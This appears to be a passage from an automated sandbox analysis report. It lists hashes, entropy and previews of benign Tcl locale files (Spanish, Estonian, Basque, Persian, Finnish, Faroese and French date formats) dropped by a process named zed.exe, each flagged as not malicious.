                                                                                                                                                                                                                                            SHA-512:C6176EE48515BDFC09B8347DAC5FD2C0165AA765916457DC7B057E526785AC912481CB72F118D2943372213B23CE3C39739263C2B3DA4DBFEB24C522ACC0439D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PA DATE_FORMAT "%m/%d/%Y".. ::msgcat::mcset es_PA TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PA DATE_TIME_FORMAT "%m/%d/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.90959433688075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoIgzvFjoQ9X3v6ry/5oI9+3v9f6HyFvn:4EnLB383+zdB3v6ry/y3vMSVn
                                                                                                                                                                                                                                            MD5:5A5997D834DDD3E2E8FF8C6956AD54AC
                                                                                                                                                                                                                                            SHA1:AB4110E37B3665D738A8F2B3E64CBA9E99127301
                                                                                                                                                                                                                                            SHA-256:90C130B66958CF63CB3DDD2C633E58444357DBAB44C56831DD794CBD2EB1AED0
                                                                                                                                                                                                                                            SHA-512:1FEB8E77EA7B886E4A06279AC8A4B6200DBB86DCD28989651B92A0C9147A7BCFBB871DF8F904A1CF8F869BFFBD21325505AC44A4DBEBE1EFC87D43174597F1F3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PE DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_PE TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PE DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.905689521403511
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo06GriSFjoeW3v6ry/5o06T+3vrig6HyFvn:4EnLB383gG+263v6ry/gK3v+lSVn
                                                                                                                                                                                                                                            MD5:CE811BB8D12C7E6D53338759CCFB0A22
                                                                                                                                                                                                                                            SHA1:0AED290AA479DE6887CCB58D3F0A0F379EF8D558
                                                                                                                                                                                                                                            SHA-256:F790E8E48DC079DCD7DEB58170561006A31294F7E4ACBF9CF2ABFA3DB9E3FA9E
                                                                                                                                                                                                                                            SHA-512:0C73654CC3D33F76D9BF545BD6C5E42CBDD10B6D9750BFD6536806010F3B6A3C3647FB9D5E7E75A39823FDB857E13D07B7F987809C94B9F980E6D3A6D3108E85
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PR DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_PR TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PR DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.917539255090736
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo/5zvFjovE3v6ry/5o/a+3v9f6HyFvn:4EnLB383Czdt3v6ry/+3vMSVn
                                                                                                                                                                                                                                            MD5:9CD6FAC4121E3D287C87157142E32845
                                                                                                                                                                                                                                            SHA1:3081FE2197017EC8E052756A407880C1C4ED026A
                                                                                                                                                                                                                                            SHA-256:70263F7EB22822DFEE8849B7AC4418ED9331275A71E77236B59226396505CDFF
                                                                                                                                                                                                                                            SHA-512:25DC054085C4078734988EEDD87E31ABE93DA8B43512E924DE4BCDE9F8EC670436B72FAD1855484F9AC71DD0BEDD9ED30304D02219C4FFC4B0516D8889BDF9F9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PY DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_PY TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PY DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.929035824905457
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xofriSFjo3+3v6ry/5oY+3vrig6HyFvn:4EnLB383Y+22+3v6ry/Q3v+lSVn
                                                                                                                                                                                                                                            MD5:AF300EA6E733DC6820768EA16194B472
                                                                                                                                                                                                                                            SHA1:7766A6EB3D07BCC759CF6718EF3D6EC3FCE13565
                                                                                                                                                                                                                                            SHA-256:26A38B3745C95673D21BABB987F1D41EE08DDA945C670F5432BA0CE6F893C0E9
                                                                                                                                                                                                                                            SHA-512:C38D67C912584BE539D71881C6517AC186CBB336A160602DA716CE2708B2D38CE8FA7DD23EDB98890ABB7119B924B6C7816C18EC18F20C49D6284DF2386E32EE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_SV DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_SV TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_SV DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.923802447598272
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xooygzvFjooq9X3v6ry/5ooy9+3v9f6HyFvn:4EnLB3835rzdbsX3v6ry/5J3vMSVn
                                                                                                                                                                                                                                            MD5:2DC550FEC3F477B1159B824479BCE707
                                                                                                                                                                                                                                            SHA1:4D0B20CF3E50B64D74655A405A7750E0B0BB4375
                                                                                                                                                                                                                                            SHA-256:1291B58810739EA0651493DD7887F5EE3E14BDB806E06DD4BB8AE2520C742EDA
                                                                                                                                                                                                                                            SHA-512:B12B927ACA6274904928A6A6CAEC8339A794C74A1F1804FF93AABC132AF9AD8AC5117F20067A60EFEBC9887150D7ACA5BE9643FF61509666011FD203211C25B9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_UY DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_UY TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_UY DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.928484426267027
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoXrzvFjoXK3v6ry/5oXs+3v9f6HyFvn:4EnLB3838zdv3v6ry/c3vMSVn
                                                                                                                                                                                                                                            MD5:184D6C4B9F0AA874DEB959F63F7CC01B
                                                                                                                                                                                                                                            SHA1:5FB370B498289590C977F6B489FF646F0FB27425
                                                                                                                                                                                                                                            SHA-256:91191517403C712299919F9C797F952502E33CB6961D1DBEE3A7C9E8D2B170B9
                                                                                                                                                                                                                                            SHA-512:881CCAB0950AE993744ECCA141120C005F53D684167A3E5CBDDF950D110D630FB2B4F6AE6E3D0E06D5110AE25EA00A4F4DAFB03AD3B227DC8C63464D434431DA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_VE DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_VE TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_VE DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1258
                                                                                                                                                                                                                                            Entropy (8bit):4.391217201307309
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83P1Y2+1YoQVTsC/m48qpRTVTR7I/68qqq4Z0yoN7emG5wsvtqmsv5t:43P1p+1jQ9sq8y9v8Yko7emG5wKtqmKX
                                                                                                                                                                                                                                            MD5:C8C5EF2FA6DD8DBD5BBD2699BE1A0BF6
                                                                                                                                                                                                                                            SHA1:F5E26B40786B8987C98F9CBDEF5522043574A9ED
                                                                                                                                                                                                                                            SHA-256:4BEE224C21B0483CFF39BE145C671AA20CB7872C8727FD918C0E8ECA2BBEB172
                                                                                                                                                                                                                                            SHA-512:757FA85C137A11C1A3F4A8392C7A4E4030A67D0E593FA25A98BEC07DB295399AB2C0D9EBE61E07420B14387A29C060DC3AF812A1E7B85110DBB13C3C3DCB3600
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset et DAYS_OF_WEEK_ABBREV [list \.. "P"\.. "E"\.. "T"\.. "K"\.. "N"\.. "R"\.. "L"].. ::msgcat::mcset et DAYS_OF_WEEK_FULL [list \.. "p\u00fchap\u00e4ev"\.. "esmasp\u00e4ev"\.. "teisip\u00e4ev"\.. "kolmap\u00e4ev"\.. "neljap\u00e4ev"\.. "reede"\.. "laup\u00e4ev"].. ::msgcat::mcset et MONTHS_ABBREV [list \.. "Jaan"\.. "Veebr"\.. "M\u00e4rts"\.. "Apr"\.. "Mai"\.. "Juuni"\.. "Juuli"\.. "Aug"\.. "Sept"\.. "Okt"\.. "Nov"\.. "Dets"\.. ""].. ::msgcat::mcset et MONTHS_FULL [list \.. "Jaanuar"\.. "Veebruar"\.. "M\u00e4rts"\.. "Aprill"\.. "Mai"\.. "Juuni"\.. "Juuli"\.. "August"\.. "September"\.. "Oktoober"\.. "November"\.. "De
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1032
                                                                                                                                                                                                                                            Entropy (8bit):4.002617252503668
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83DEXk8TT7vXk8TTMtzCIsOo/ssP6tvf1I49sHT:434bTbbTc+RjKi4mz
                                                                                                                                                                                                                                            MD5:ED9805AF5BFB54EB28C6CB3975F86F5B
                                                                                                                                                                                                                                            SHA1:2BD91BD850028712F35A2DDB2555036FBF6E8114
                                                                                                                                                                                                                                            SHA-256:6889B57D29B670C6CFB7B5A3F2F1749D12C802E8E9629014D06CE23C034C7EF1
                                                                                                                                                                                                                                            SHA-512:16F31DE5D2B0D3ED2D975C7891C73C48F073CDAC28F17572FC9424C2D384DDFE9E5E235F17C788F42840CB2D819D2D9499B909AB80FEF1B09F2AE1627CF1DADC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset eu DAYS_OF_WEEK_ABBREV [list \.. "igandea"\.. "astelehena"\.. "asteartea"\.. "asteazkena"\.. "osteguna"\.. "ostirala"\.. "larunbata"].. ::msgcat::mcset eu DAYS_OF_WEEK_FULL [list \.. "igandea"\.. "astelehena"\.. "asteartea"\.. "asteazkena"\.. "osteguna"\.. "ostirala"\.. "larunbata"].. ::msgcat::mcset eu MONTHS_ABBREV [list \.. "urt"\.. "ots"\.. "mar"\.. "api"\.. "mai"\.. "eka"\.. "uzt"\.. "abu"\.. "ira"\.. "urr"\.. "aza"\.. "abe"\.. ""].. ::msgcat::mcset eu MONTHS_FULL [list \.. "urtarrila"\.. "otsaila"\.. "martxoa"\.. "apirila"\.. "maiatza"\.. "ekaina"\.. "uztaila"\.. "abuztua"\.. "iraila"\.. "urria"\.. "azaroa"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):294
                                                                                                                                                                                                                                            Entropy (8bit):4.915392589807169
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoszFnJF+l6VvBoszw3vLjoszw3v6mjosz++3v/RHvn:4EnLB383FL+l6VQ3vO3v6G3vZPn
                                                                                                                                                                                                                                            MD5:4C91AA000D4316585893025CBB96E910
                                                                                                                                                                                                                                            SHA1:3D4E73839A1A8CB9DEC1E59D9D2813257D9480F0
                                                                                                                                                                                                                                            SHA-256:D45CC432E5743E6CEC34E9A1E0F91A9D5C315CDA409E0826B51AD9D908479EB6
                                                                                                                                                                                                                                            SHA-512:0731F2EEB22ADC7EF8AF215B9EB4C5A66B33BC90E4F80CF7AA482AD002CB30543547230124A0507EC79EDDD6903A042EDA5D7C8AFD77F7FC994EFC6853FABB05
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset eu_ES DATE_FORMAT "%a, %Yeko %bren %da".. ::msgcat::mcset eu_ES TIME_FORMAT "%T".. ::msgcat::mcset eu_ES TIME_FORMAT_12 "%T".. ::msgcat::mcset eu_ES DATE_TIME_FORMAT "%y-%m-%d %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1711
                                                                                                                                                                                                                                            Entropy (8bit):4.21837106187395
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83CnMqnbxbGwgjSyiY/Xw2mS1yM/8ye48YyfNqTb2gyj/8yHkQp:43Yzyhgvs9yi4P
                                                                                                                                                                                                                                            MD5:7AB25F4E7E457469DC61A33176B3AA72
                                                                                                                                                                                                                                            SHA1:EEA98283D250A99E33DD4D5D9B1B76A029716CE6
                                                                                                                                                                                                                                            SHA-256:86898728B275288693B200568DC927C3FF5B9050690876C4441A8339DAE06386
                                                                                                                                                                                                                                            SHA-512:7524437F91E91751BEB7A378D7674C49E5D84B716FE962F4C23580C46A671F3F33638FCD37A8F90C86E24DA8F54448E06AC9C3AEFFB5613E94A04E512C1AD68D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fa DAYS_OF_WEEK_ABBREV [list \.. "\u06cc\u2214"\.. "\u062f\u2214"\.. "\u0633\u2214"\.. "\u0686\u2214"\.. "\u067e\u2214"\.. "\u062c\u2214"\.. "\u0634\u2214"].. ::msgcat::mcset fa DAYS_OF_WEEK_FULL [list \.. "\u06cc\u06cc\u200c\u0634\u0646\u0628\u0647"\.. "\u062f\u0648\u0634\u0646\u0628\u0647"\.. "\u0633\u0647\u200c\u0634\u0646\u0628\u0647"\.. "\u0686\u0647\u0627\u0631\u0634\u0646\u0628\u0647"\.. "\u067e\u0646\u062c\u200c\u0634\u0646\u0628\u0647"\.. "\u062c\u0645\u0639\u0647"\.. "\u0634\u0646\u0628\u0647"].. ::msgcat::mcset fa MONTHS_ABBREV [list \.. "\u0698\u0627\u0646"\.. "\u0641\u0648\u0631"\.. "\u0645\u0627\u0631"\.. "\u0622\u0648\u0631"\.. "\u0645\u0640\u0647"\.. "\u0698\u0648\u0646"\.. "\u0698\u0648\u06cc"\.. "\u0627\u0648\u062a
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2009
                                                                                                                                                                                                                                            Entropy (8bit):4.491667766230948
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83KnMqnbxbGUgjDiY/Xw2mS1yM/8ye48tfNqTb2gyj/8yHkQLoRv9v/vNv0P:43wihgvsai4Rmv53JU
                                                                                                                                                                                                                                            MD5:C59EE7CA80AD9F612A21C8B6674A820E
                                                                                                                                                                                                                                            SHA1:AEFD631EFC1892063244FA622DE1A091C461E370
                                                                                                                                                                                                                                            SHA-256:6B56545C1AE1DE53BC2389BB7AE59F115BADE24F907E384E079491DC77D6541D
                                                                                                                                                                                                                                            SHA-512:42F52091480599D317FB80DF8E52A6C6F88614C6172BF4033974DD136FB30E6F47D38982C8A7BC14CF3165C3EBAE3680F94DF3A0ED079AB68165286251CD0BD7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fa_IN DAYS_OF_WEEK_ABBREV [list \.. "\u06cc\u2214"\.. "\u062f\u2214"\.. "\u0633\u2214"\.. "\u0686\u2214"\.. "\u067e\u2214"\.. "\u062c\u2214"\.. "\u0634\u2214"].. ::msgcat::mcset fa_IN DAYS_OF_WEEK_FULL [list \.. "\u06cc\u06cc\u200c\u0634\u0646\u0628\u0647"\.. "\u062f\u0648\u0634\u0646\u0628\u0647"\.. "\u0633\u0647\u200c\u0634\u0646\u0628\u0647"\.. "\u0686\u0647\u0627\u0631\u0634\u0646\u0628\u0647"\.. "\u067e\u0646\u062c\u200c\u0634\u0646\u0628\u0647"\.. "\u062c\u0645\u0639\u0647"\.. "\u0634\u0646\u0628\u0647"].. ::msgcat::mcset fa_IN MONTHS_ABBREV [list \.. "\u0698\u0627\u0646"\.. "\u0641\u0648\u0631"\.. "\u0645\u0627\u0631"\.. "\u0622\u0648\u0631"\.. "\u0645\u0640\u0647"\.. "\u0698\u0648\u0646"\.. "\u0698\u0648\u06cc"\.. "\u0627\u0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):426
                                                                                                                                                                                                                                            Entropy (8bit):5.12739029869254
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:4EnLB383D2WGz7A/3vy3v6TANCmK3vz7AAbn:4aR83DoPivkvFk5vPN
                                                                                                                                                                                                                                            MD5:9778A7C3ABD37ECBEC0BB9715E52FAF8
                                                                                                                                                                                                                                            SHA1:D8063CA7779674EB1D9FE3E4B4774DB20B93038B
                                                                                                                                                                                                                                            SHA-256:3D9779C27E8960143D00961F6E82124120FD47B7F3CB82DB3DF21CDD9090C707
                                                                                                                                                                                                                                            SHA-512:B90B4A96CE5E8B9BF512B98C406603C60EA00F6740D04CD1FC30810C7155A37851AE5E28716F959137806F1A9E3152D2A0D79B8EA7E681A0737A28593657DE66
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fa_IR AM "\u0635\u0628\u062d".. ::msgcat::mcset fa_IR PM "\u0639\u0635\u0631".. ::msgcat::mcset fa_IR DATE_FORMAT "%d\u2044%m\u2044%Y".. ::msgcat::mcset fa_IR TIME_FORMAT "%S:%M:%H".. ::msgcat::mcset fa_IR TIME_FORMAT_12 "%S:%M:%l %P".. ::msgcat::mcset fa_IR DATE_TIME_FORMAT "%d\u2044%m\u2044%Y %S:%M:%H %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1195
                                                                                                                                                                                                                                            Entropy (8bit):4.32217771842326
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83KTvIhmuw4tW/UWJTttWKeqA+3ewvtyv3e6:43YvIwuw4t05ttnlzt0p
                                                                                                                                                                                                                                            MD5:CC06F0ABD8F985654DAD8256598EBCB7
                                                                                                                                                                                                                                            SHA1:71C880F9F395ACD32AF7F538033211F392F83645
                                                                                                                                                                                                                                            SHA-256:9929A6B7139BD7E0F29487F7888A83E4C4F5E9CE0352738CFCA94EE2DDF3BD6B
                                                                                                                                                                                                                                            SHA-512:E1292665270B6FBF7738CC3864B55194E7B827C6AD9492FB2E54DC1B626159B243052CE502335B9D92E2B8F58A4DD1FA0E628CB6A9D1D3A652FE2B93A3FB711A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fi DAYS_OF_WEEK_ABBREV [list \.. "su"\.. "ma"\.. "ti"\.. "ke"\.. "to"\.. "pe"\.. "la"].. ::msgcat::mcset fi DAYS_OF_WEEK_FULL [list \.. "sunnuntai"\.. "maanantai"\.. "tiistai"\.. "keskiviikko"\.. "torstai"\.. "perjantai"\.. "lauantai"].. ::msgcat::mcset fi MONTHS_ABBREV [list \.. "tammi"\.. "helmi"\.. "maalis"\.. "huhti"\.. "touko"\.. "kes\u00e4"\.. "hein\u00e4"\.. "elo"\.. "syys"\.. "loka"\.. "marras"\.. "joulu"\.. ""].. ::msgcat::mcset fi MONTHS_FULL [list \.. "tammikuu"\.. "helmikuu"\.. "maaliskuu"\.. "huhtikuu"\.. "toukokuu"\.. "kes\u00e4kuu"\.. "hein\u00e4kuu"\.. "elokuu"\.. "syyskuu"\.. "lokakuu"\.. "marraskuu"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1033
                                                                                                                                                                                                                                            Entropy (8bit):4.15884265510429
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR834YPxTSBFSa+E6rIsmYmyAxyIQbXHU92W1T:43a6rIyAE0B
                                                                                                                                                                                                                                            MD5:5D224E66FD9521CA4327D4F164CD6585
                                                                                                                                                                                                                                            SHA1:FC8F4C1D9A69931679028DE02155D96A18F6542E
                                                                                                                                                                                                                                            SHA-256:2EC9B03469FA38B260915C93318F446EA5E12B9090BD441936B57552EBA1E3C9
                                                                                                                                                                                                                                            SHA-512:0E0F97D99F0274A8A92AA7DC992B252A0BB696D69A8835602D8F4C03A6A15780F45971F00863436949CD81AD7DF6EE6BC463CE5B9FECF5E39508BA4D4E83C693
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fo DAYS_OF_WEEK_ABBREV [list \.. "sun"\.. "m\u00e1n"\.. "t\u00fds"\.. "mik"\.. "h\u00f3s"\.. "fr\u00ed"\.. "ley"].. ::msgcat::mcset fo DAYS_OF_WEEK_FULL [list \.. "sunnudagur"\.. "m\u00e1nadagur"\.. "t\u00fdsdagur"\.. "mikudagur"\.. "h\u00f3sdagur"\.. "fr\u00edggjadagur"\.. "leygardagur"].. ::msgcat::mcset fo MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset fo MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "apr\u00edl"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.864028070948858
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoZA4WjoZd3vLjoZd3v6mjoZd+3vnFDoAkvn:4EnLB3831P23vS3v6u3v9dmn
                                                                                                                                                                                                                                            MD5:92E2B6483B2374817548F4EAA1731820
                                                                                                                                                                                                                                            SHA1:071E1E9368CCB4EC864E78622B2113F460920203
                                                                                                                                                                                                                                            SHA-256:C3DCCF5E5904C24D4AD9AAA36160A78F5397A7452510C0C0E61DE4DE863305CB
                                                                                                                                                                                                                                            SHA-512:E79D4D38A22298252FA46D15C383CFB2A1E49E8196C265A58F9BA4982DFD9CE29E87C0B85BE3F39617359451831B792FCD3092A52EDF8FFD999AFE5CFE1D170D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fo_FO DATE_FORMAT "%d/%m-%Y".. ::msgcat::mcset fo_FO TIME_FORMAT "%T".. ::msgcat::mcset fo_FO TIME_FORMAT_12 "%T".. ::msgcat::mcset fo_FO DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1257
                                                                                                                                                                                                                                            Entropy (8bit):4.383721663740675
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR835LzAX2t6KOkPwzZIGzRmzQf1waGqHvivh:43mlwIFZtA/qPkh
                                                                                                                                                                                                                                            MD5:4D63B4A7CF13A28A6F6784B5597EEF43
                                                                                                                                                                                                                                            SHA1:FE1B35A93CB72666D7D6BC37D9BE081B05A00CD9
                                                                                                                                                                                                                                            SHA-256:96B1E1E12CD13A56722EBF27D362C70B467342FA1282A40B89FB16B5105A0480
                                                                                                                                                                                                                                            SHA-512:5647CAE859B62C7CE1CEE6426A076361D2A29EFE6B6F311DDC0E7D006194BA68D575852FEC5FDE2AB43DF8AE440C57013D32A3951095CB856327070FD9BD1C76
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fr DAYS_OF_WEEK_ABBREV [list \.. "dim."\.. "lun."\.. "mar."\.. "mer."\.. "jeu."\.. "ven."\.. "sam."].. ::msgcat::mcset fr DAYS_OF_WEEK_FULL [list \.. "dimanche"\.. "lundi"\.. "mardi"\.. "mercredi"\.. "jeudi"\.. "vendredi"\.. "samedi"].. ::msgcat::mcset fr MONTHS_ABBREV [list \.. "janv."\.. "f\u00e9vr."\.. "mars"\.. "avr."\.. "mai"\.. "juin"\.. "juil."\.. "ao\u00fbt"\.. "sept."\.. "oct."\.. "nov."\.. "d\u00e9c."\.. ""].. ::msgcat::mcset fr MONTHS_FULL [list \.. "janvier"\.. "f\u00e9vrier"\.. "mars"\.. "avril"\.. "mai"\.. "juin"\.. "juillet"\.. "ao\u00fbt"\.. "septembre"\.. "octobre"\.. "novembre"\.. "d\u00e9cembre
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.910112619660625
